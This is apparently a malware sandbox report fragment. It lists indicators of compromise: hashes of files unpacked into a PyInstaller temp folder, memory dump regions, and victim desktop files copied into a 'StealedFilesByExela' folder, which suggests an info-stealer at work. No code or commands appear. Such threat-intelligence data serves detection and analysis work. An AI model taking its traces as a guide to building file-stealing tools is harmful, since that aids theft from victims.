SHA512 054cdadb09cf6816f1914c2607dfee9f0d56e1c9fb79ce91f84906f67c177a42036e39eec31318ac788512d8881af8a48754c5f77bac3422c4480bf019da4527

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-console-l1-1-0.dll

MD5 1bebd9b65ed18b680f7e39bef09fe6ce
SHA1 b9dddcd699effcd6714c3cf7320d2389674bbdd7
SHA256 e756f6970905657cf73ecb3f57bae55a67be29afa75ae4d16046b0f7229708eb
SHA512 5cf255b9ffabde7713ae84278049135a64b02b0576f556d5b31bfd5091f779245f354a42a17cdbfaf14e91f856843f12ff556eb216a538592c704f41804f6172

C:\Users\Admin\AppData\Local\Temp\_MEI2482\libffi-8.dll

MD5 decbba3add4c2246928ab385fb16a21e
SHA1 5f019eff11de3122ffa67a06d52d446a3448b75e
SHA256 4b43c1e42f6050ddb8e184c8ec4fb1de4a6001e068ece8e6ad47de0cc9fd4a2d
SHA512 760a42a3eb3ca13fa7b95d3bd0f411c270594ae3cf1d3cda349fa4f8b06ebe548b60cd438d68e2da37de0bc6f1c711823f5e917da02ed7047a45779ee08d7012

memory/952-136-0x00007FFF3A930000-0x00007FFF3A954000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI2482\_ctypes.pyd

MD5 b4c41a4a46e1d08206c109ce547480c7
SHA1 9588387007a49ec2304160f27376aedca5bc854d
SHA256 9925ab71a4d74ce0ccc036034d422782395dd496472bd2d7b6d617f4d6ddc1f9
SHA512 30debb8e766b430a57f3f6649eeb04eb0aad75ab50423252585db7e28a974d629eb81844a05f5cb94c1702308d3feda7a7a99cb37458e2acb8e87efc486a1d33

C:\Users\Admin\AppData\Local\Temp\_MEI2482\base_library.zip

MD5 65089bae0fe6af0f4d44313a26c87f16
SHA1 18449f77a946a7aadc7edf19c82006d22aaa487c
SHA256 d204f68e076e4662bc8a585ff8cdfe3f0fc602ecc2e2f12afbe23b25425869d8
SHA512 0c710bcaa747debdee12fa181afdeba6b24b77280b07d65cfeacc6a7d327c7af6f8c559e01701d65f5219197ea756df023b6b04ed826ea31f27f74cb776b1618

memory/952-200-0x00007FFF21F00000-0x00007FFF22275000-memory.dmp

memory/952-201-0x00007FFF21E40000-0x00007FFF21EF8000-memory.dmp

memory/952-199-0x00007FFF35070000-0x00007FFF3509E000-memory.dmp

memory/952-198-0x00007FFF227A0000-0x00007FFF22D88000-memory.dmp

memory/952-205-0x00007FFF3D3F0000-0x00007FFF3D402000-memory.dmp

memory/952-212-0x00007FFF22280000-0x00007FFF223F3000-memory.dmp

memory/952-211-0x00007FFF39BE0000-0x00007FFF39BF9000-memory.dmp

memory/952-210-0x00007FFF3A850000-0x00007FFF3A869000-memory.dmp

memory/952-209-0x00007FFF39C00000-0x00007FFF39C1E000-memory.dmp

memory/952-208-0x00007FFF355A0000-0x00007FFF356BC000-memory.dmp

memory/952-228-0x00007FFF38FE0000-0x00007FFF38FF1000-memory.dmp

memory/952-230-0x00007FFF21E40000-0x00007FFF21EF8000-memory.dmp

memory/952-231-0x00007FFF21590000-0x00007FFF21E31000-memory.dmp

memory/952-229-0x00007FFF35070000-0x00007FFF3509E000-memory.dmp

memory/952-227-0x00007FFF2FC00000-0x00007FFF2FC18000-memory.dmp

memory/952-226-0x00007FFF3A980000-0x00007FFF3A98A000-memory.dmp

memory/952-225-0x00007FFF2FC20000-0x00007FFF2FC4D000-memory.dmp

memory/952-224-0x00007FFF35340000-0x00007FFF35386000-memory.dmp

memory/952-232-0x00007FFF2EC80000-0x00007FFF2ECB7000-memory.dmp

memory/952-223-0x00007FFF39700000-0x00007FFF39718000-memory.dmp

memory/952-222-0x00007FFF21F00000-0x00007FFF22275000-memory.dmp

memory/952-221-0x00007FFF350A0000-0x00007FFF350C3000-memory.dmp

memory/952-207-0x00007FFF3A990000-0x00007FFF3A9A4000-memory.dmp

memory/952-206-0x00007FFF3A9B0000-0x00007FFF3A9CC000-memory.dmp

memory/952-204-0x00007FFF3A930000-0x00007FFF3A954000-memory.dmp

memory/952-203-0x00007FFF3D4F0000-0x00007FFF3D505000-memory.dmp

memory/952-247-0x00007FFF3D4F0000-0x00007FFF3D505000-memory.dmp

memory/952-269-0x00007FFF3D3F0000-0x00007FFF3D402000-memory.dmp

memory/2928-272-0x0000018DCCC70000-0x0000018DCCC7E000-memory.dmp

memory/2928-273-0x0000018DCEF50000-0x0000018DCEF6A000-memory.dmp

memory/952-312-0x00007FFF3D630000-0x00007FFF3D63D000-memory.dmp

memory/952-335-0x00007FFF39BE0000-0x00007FFF39BF9000-memory.dmp

memory/952-338-0x00007FFF2FC20000-0x00007FFF2FC4D000-memory.dmp

memory/952-337-0x00007FFF35340000-0x00007FFF35386000-memory.dmp

memory/952-336-0x00007FFF39700000-0x00007FFF39718000-memory.dmp

memory/952-351-0x00007FFF3A930000-0x00007FFF3A954000-memory.dmp

memory/952-362-0x00007FFF3D4F0000-0x00007FFF3D505000-memory.dmp

memory/952-364-0x00007FFF3A9B0000-0x00007FFF3A9CC000-memory.dmp

memory/952-378-0x00007FFF21590000-0x00007FFF21E31000-memory.dmp

memory/952-358-0x00007FFF22280000-0x00007FFF223F3000-memory.dmp

memory/952-360-0x00007FFF21F00000-0x00007FFF22275000-memory.dmp

memory/952-350-0x00007FFF227A0000-0x00007FFF22D88000-memory.dmp

memory/4628-394-0x000001A6D0300000-0x000001A6D0308000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\DebugOut.docx

MD5 3571850d19beb4e04c8639b6d9c045ab
SHA1 31b5912acab668f972dd52cefd8099efbdf2f8c3
SHA256 78f45956e7b3b5ca20be48892f2f9d0c98c97566799e54b8932d90fba1d71ac7
SHA512 4b906873a9405994483e3fd0027eb6e2c9bfb65ed77b6898fe51760e3ac5bd06ca9ee60e87f264521834f6435ea89d50de526782ae2e8a5cd1b7527b9ae5c500

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\DenyDismount.docx

MD5 d746cf353dd437062078d98f7b84423c
SHA1 df94c56225c216f6ca05faa84b9ca958ced3759e
SHA256 8730c263b5044eaa8d611922b7cae3573f03444e7156b973844e25f4c81847dc
SHA512 b7dcbd4035ec37463c60b4ee26c81f64a3a5e4e04977ac3a10f77941bca522a764187464b7ed538602cd90239792290d280acdf91085904e1d05ccf5854ea764

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\MountHide.mp4

MD5 753b56179f56a0b01cd2059cdee8a07d
SHA1 d2a25c24b02ff6b402616778587214f3eb21cd06
SHA256 85aa9d7e1b5f5362a6d62fe19e8cafa26e4e79367cbdfdc9468a4434fa0e970b
SHA512 b4813f10653f3b9fbe8991a00d4f614f0c3bd7a18bc7779193df42552308671178a4bd517dff306a392f49dbce3be360788a3ef143de5f263650b5aff041233a

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\OptimizeConfirm.xlsx

MD5 20521c7249692581eda6c1664233ae07
SHA1 b12ff4eacab13173569655553a297087a28ba7ee
SHA256 a51b6208f98602bd3ce42239fda29f65ecb389a29aa9794a6d25c8cc75191255
SHA512 e714bae12afb61d16f479afa8072717f4740ae657230b884100bfde6a0699f5d663f3486e16eab54c81df1cc6a6d35d8f3fa91b7985f68382dc6e9bb86cb2a88

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UpdateSelect.xlsx
